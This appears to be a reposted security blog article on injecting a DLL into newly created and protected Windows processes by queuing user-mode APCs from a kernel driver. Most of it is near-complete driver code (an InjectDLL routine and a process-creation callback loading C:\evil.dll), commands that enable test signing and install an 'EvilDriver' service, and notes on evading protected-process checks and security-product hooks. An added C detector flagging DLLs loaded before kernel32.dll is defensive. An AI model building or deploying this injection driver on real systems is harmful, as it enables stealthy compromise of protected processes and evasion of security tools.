DLL Injection via APC from Driver into Protected Processes

DLL injection is the general technique of loading a dynamic-link library (DLL) into another process's address space. The variant described here does it from a kernel-mode driver: the driver queues an Asynchronous Procedure Call (APC) to a thread of each newly created process, protected processes included, and the APC loads the DLL. Because the APC is queued while the process is still initializing, the DLL is mapped before kernel32.dll and before any user-mode security checks or hooks that are set up at process start; the post claims this works even when the DLL is unsigned.

How APC Injection Works

An APC is a routine queued to one specific thread; a user-mode APC runs in that thread's user context the next time the thread is able to deliver APCs. APC injection queues a user-mode APC whose routine loads the attacker's DLL, so the target thread does the loading itself. The user-mode form of this (QueueUserAPC, which ends in NtQueueApcThread) needs a thread handle and passes through the usual access checks and any hooks on that system call. Done from a kernel driver with KeInitializeApc and KeInsertQueueApc, none of that applies: no handle is opened, no user-mode API is called in the parent, and the handle-based protection of protected processes is never consulted.

Steps for Driver-Based APC Injection

  1. Write a Kernel Driver – All the work happens in a kernel-mode driver, so it has to get loaded first: on a system with Driver Signature Enforcement that means a signed driver or a test-signing machine.
  2. Locate Target Processes – Register a process-creation callback with PsSetCreateProcessNotifyRoutine. It is a notification hook, not an enumeration API, and it fires on the creating thread, so the driver still has to pick a thread that belongs to the new process for the APC.
  3. Allocate Memory in Target Process – Use `ZwAllocateVirtualMemory`, either with a handle to the target or with `ZwCurrentProcess()` while attached to it via `KeStackAttachProcess`.
  4. Write DLL Path – Copy the DLL path into that buffer, with `ZwWriteVirtualMemory` (which the WDK headers do not declare) or with a plain copy while attached.
  5. Queue APC – Build a user-mode APC with `KeInitializeApc` (normal routine = a user-mode function in the target, context = the path buffer) and queue it to the chosen thread with `KeInsertQueueApc`; both are exported by ntoskrnl but undocumented.

Example Code Snippets

Kernel Driver (C) – APC Injection

#include <ntifs.h>
// KeInitializeApc/KeInsertQueueApc are exported but undocumented: declare them (and the APC
// routine types) locally. Note that an APC is queued to a thread, not to a process.
typedef enum { OriginalApcEnvironment, AttachedApcEnvironment, CurrentApcEnvironment, InsertApcEnvironment } KAPC_ENVIRONMENT;
typedef VOID (NTAPI *APC_NORMAL_ROUTINE)(PVOID Ctx, PVOID Arg1, PVOID Arg2);
typedef VOID (NTAPI *APC_KERNEL_ROUTINE)(PKAPC Apc, APC_NORMAL_ROUTINE *Nr, PVOID *Ctx, PVOID *Arg1, PVOID *Arg2);
NTKERNELAPI VOID NTAPI KeInitializeApc(PKAPC Apc, PKTHREAD Thread, KAPC_ENVIRONMENT Env, APC_KERNEL_ROUTINE Kr,
                                       PVOID Rundown, APC_NORMAL_ROUTINE Nr, KPROCESSOR_MODE Mode, PVOID Ctx);
NTKERNELAPI BOOLEAN NTAPI KeInsertQueueApc(PKAPC Apc, PVOID Arg1, PVOID Arg2, KPRIORITY Increment);
#define APC_TAG 'cpaK'
// Kernel half of the APC: runs at APC_LEVEL before the user routine and only frees the KAPC.
VOID NTAPI ApcKernelRoutine(PKAPC Apc, APC_NORMAL_ROUTINE *Nr, PVOID *Ctx, PVOID *Arg1, PVOID *Arg2) {
    UNREFERENCED_PARAMETER(Nr); UNREFERENCED_PARAMETER(Ctx); UNREFERENCED_PARAMETER(Arg1); UNREFERENCED_PARAMETER(Arg2);
    ExFreePoolWithTag(Apc, APC_TAG);
}
// Steps 3-5: copy DllPath into the target, then queue a user-mode APC on TargetThread (a thread
// owned by TargetProcess) that calls UserRoutine(path). UserRoutine is a user-mode function in the
// target taking the path pointer as its first argument; which one, and how its address is found, is not shown here.
NTSTATUS InjectDLL(PEPROCESS TargetProcess, PETHREAD TargetThread, PUNICODE_STRING DllPath, PVOID UserRoutine) {
    KAPC_STATE State; PVOID UserPath = NULL; SIZE_T Size = DllPath->Length + sizeof(WCHAR);
    KeStackAttachProcess(TargetProcess, &State);       // run in the target's address space
    NTSTATUS Status = ZwAllocateVirtualMemory(ZwCurrentProcess(), &UserPath, 0, &Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (NT_SUCCESS(Status)) { RtlZeroMemory(UserPath, Size); RtlCopyMemory(UserPath, DllPath->Buffer, DllPath->Length); }  // attached, so a plain copy replaces step 4's ZwWriteVirtualMemory
    KeUnstackDetachProcess(&State);
    if (!NT_SUCCESS(Status)) return Status;
    PKAPC Apc = (PKAPC)ExAllocatePoolWithTag(NonPagedPool, sizeof(KAPC), APC_TAG);
    if (!Apc) return STATUS_INSUFFICIENT_RESOURCES;
    KeInitializeApc(Apc, (PKTHREAD)TargetThread, OriginalApcEnvironment, ApcKernelRoutine, NULL, (APC_NORMAL_ROUTINE)UserRoutine, UserMode, UserPath);
    if (!KeInsertQueueApc(Apc, NULL, NULL, IO_NO_INCREMENT)) {   // FALSE means the thread is exiting
        ExFreePoolWithTag(Apc, APC_TAG);
        return STATUS_UNSUCCESSFUL;
    }
    return STATUS_SUCCESS;
}

Finding Processes to Inject

// Step 2: PsSetCreateProcessNotifyRoutine does not enumerate processes; it registers a callback
// that fires for every process creation and exit. Register it in DriverEntry with
// PsSetCreateProcessNotifyRoutine(ProcessCallback, FALSE) and remove it on unload with TRUE.
// The required prototype returns VOID, not NTSTATUS. Two placeholders for things the page does
// not provide are declared so the fragment is complete: a referenced thread owned by the new
// process (this callback runs on the *creating* thread, so KeGetCurrentThread() would hit the
// parent) and the user-mode routine the APC should call.
PETHREAD FindThreadOfProcess(PEPROCESS Process);   // placeholder: returns a referenced PETHREAD or NULL; not shown on this page
PVOID    FindUserRoutine(PEPROCESS Process);       // placeholder: not shown on this page
static UNICODE_STRING DllPath = RTL_CONSTANT_STRING(L"C:\\evil.dll");

VOID ProcessCallback(HANDLE ParentId, HANDLE ProcessId, BOOLEAN Create) {
    UNREFERENCED_PARAMETER(ParentId);
    if (!Create) return;                                   // exit notifications are ignored
    PEPROCESS Process;
    if (!NT_SUCCESS(PsLookupProcessByProcessId(ProcessId, &Process))) return;
    PETHREAD Thread = FindThreadOfProcess(Process);
    if (Thread) {
        InjectDLL(Process, Thread, &DllPath, FindUserRoutine(Process));
        ObDereferenceObject(Thread);
    }
    ObDereferenceObject(Process);                          // balance PsLookupProcessByProcessId
}

Bypassing Protections

  • Before user-mode defences exist: the APC runs while the process is still initializing, so the DLL is mapped before `kernel32.dll` and before any user-mode hooks or start-up checks a security product installs; that is what the "bypasses some signature checks" claim amounts to. Kernel-mode Code Integrity is not part of it: for a protected process it still validates every image section mapped through the normal loader, so whether an unsigned DLL actually ends up in a PPL depends on how the DLL is mapped and on that process's signing policy, not on the load order.
  • Protected Processes: because the driver never opens a handle to the target, the access checks that keep user-mode code out of protected processes do not apply. The post reports it works on most protected processes except `smss.exe` (the Session Manager, a native process that never loads kernel32.dll).
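The artifact this technique leaves behind is the load order itself: the injected DLL sits in the loader's module list ahead of kernel32.dll, where normally only the main image and ntdll.dll precede it. The C program below is an added example, not code from the original post; it scans constructed per-process module lists (the shape a kernel debugger module listing or EDR module telemetry provides) and flags exactly that anomaly, while leaving native processes such as smss.exe alone because the rule has no meaning where kernel32.dll never loads. The process names, paths and the evil.dll entry are made-up sample data, and the allowlist of modules permitted to load early is an assumption to tune for your own fleet.

```c
/*
 * Added example (not from the original page): load-order heuristic for
 * driver-side APC injection. Input is a constructed snapshot of per-process
 * module lists in load order, as a debugger or EDR telemetry would record them.
 */
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strcasecmp (POSIX); MSVC has _stricmp */

#define MAX_MODULES 16

typedef struct {
    const char *process;                 /* image name */
    const char *modules[MAX_MODULES];    /* full paths in load order, NULL-terminated */
} ProcessSnapshot;

/* Modules that legitimately load before kernel32.dll. Assumption: tune for your fleet. */
static const char *const EARLY_ALLOWLIST[] = { "ntdll.dll", NULL };

static const char *basename_of(const char *path) {
    const char *p = strrchr(path, '\\');
    return p ? p + 1 : path;
}

static int basename_is(const char *path, const char *name) {
    return strcasecmp(basename_of(path), name) == 0;
}

static int is_allowlisted(const char *path) {
    for (int i = 0; EARLY_ALLOWLIST[i]; i++)
        if (basename_is(path, EARLY_ALLOWLIST[i])) return 1;
    return 0;
}

/*
 * Index of the first suspicious module: one that is neither the main image
 * (index 0) nor allowlisted, yet appears before kernel32.dll. Returns -1 when
 * nothing is suspicious or when kernel32.dll never loads at all: a native
 * process such as smss.exe links only against ntdll.dll, so the "before
 * kernel32" rule does not apply there and would only produce noise.
 */
int early_load_index(const ProcessSnapshot *ps) {
    int k32 = -1;
    for (int i = 0; ps->modules[i]; i++)
        if (basename_is(ps->modules[i], "kernel32.dll")) { k32 = i; break; }
    if (k32 < 0) return -1;
    for (int i = 1; i < k32; i++)
        if (!is_allowlisted(ps->modules[i])) return i;
    return -1;
}

/* Scan a set of snapshots, report hits, and return how many were flagged. */
int scan_snapshots(const ProcessSnapshot *list, int count) {
    int flagged = 0;
    for (int i = 0; i < count; i++) {
        int idx = early_load_index(&list[i]);
        if (idx >= 0) {
            flagged++;
            printf("SUSPICIOUS %s: %s loaded before kernel32.dll\n",
                   list[i].process, list[i].modules[idx]);
        }
    }
    return flagged;
}

/* Constructed sample data, not real telemetry. */
const ProcessSnapshot SAMPLE[] = {
    { "notepad.exe", { "C:\\Windows\\notepad.exe", "C:\\Windows\\System32\\ntdll.dll",
                       "C:\\Windows\\System32\\kernel32.dll",
                       "C:\\Windows\\System32\\KernelBase.dll", NULL } },
    { "svchost.exe", { "C:\\Windows\\System32\\svchost.exe",
                       "C:\\Windows\\System32\\ntdll.dll",
                       "C:\\evil.dll",                      /* the injected DLL */
                       "C:\\Windows\\System32\\kernel32.dll",
                       "C:\\Windows\\System32\\KernelBase.dll", NULL } },
    { "smss.exe",    { "C:\\Windows\\System32\\smss.exe",
                       "C:\\Windows\\System32\\ntdll.dll", NULL } },
};
const int SAMPLE_COUNT = (int)(sizeof SAMPLE / sizeof SAMPLE[0]);

int main(void) {
    int n = scan_snapshots(SAMPLE, SAMPLE_COUNT);
    printf("%d of %d processes flagged\n", n, SAMPLE_COUNT);
    return 0;
}
```

Run against the three constructed snapshots it flags only svchost.exe (evil.dll at index 2, ahead of kernel32.dll) and stays quiet on smss.exe. In production the same logic wants a richer allowlist (anything your environment legitimately loads from the ntdll initialization path) and a signature check on whatever it flags.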

What Undercode Say

Queuing APCs from a driver is a stealthy way to get a DLL loaded: no process handle is opened and no user-mode injection API is called, so the usual user-mode indicators are absent. The price is a kernel-mode foothold. Driver Signature Enforcement (DSE) stops an unsigned driver from loading at all, and HVCI raises the bar further on what driver code is allowed to run; PatchGuard does not object to APC queuing itself, since no kernel code or data is patched, but it does catch the kernel tampering such drivers are often paired with. Always test in controlled environments and consider the ethical implications.

Related Commands & Tools

  • Loading the driver (on a test machine; with DSE active an unsigned .sys needs test-signing mode, which takes effect after a reboot):
    bcdedit /set testsigning on
    sc create EvilDriver binPath= C:\drivers\evil.sys type= kernel
    sc start EvilDriver
    
  • Process Explorer: check each process's DLL list for the injected module.
  • WinDbg (kernel debugging): find the target and load its user-mode symbols so the module list can be inspected.
    !process 0 0 smss.exe 
    .reload /user 
    

Expected Output:

A loaded kernel driver that gets the DLL into every newly created user-mode process except smss.exe, with the DLL appearing ahead of kernel32.dll in each process's module list and no injection API ever being called from user mode.

Prediction

As kernel protections improve (e.g., HVCI, VBS), driver-based injection will become harder, pushing attackers toward firmware/hypervisor-level exploits.

Reported By: Alex S – Hackers Feeds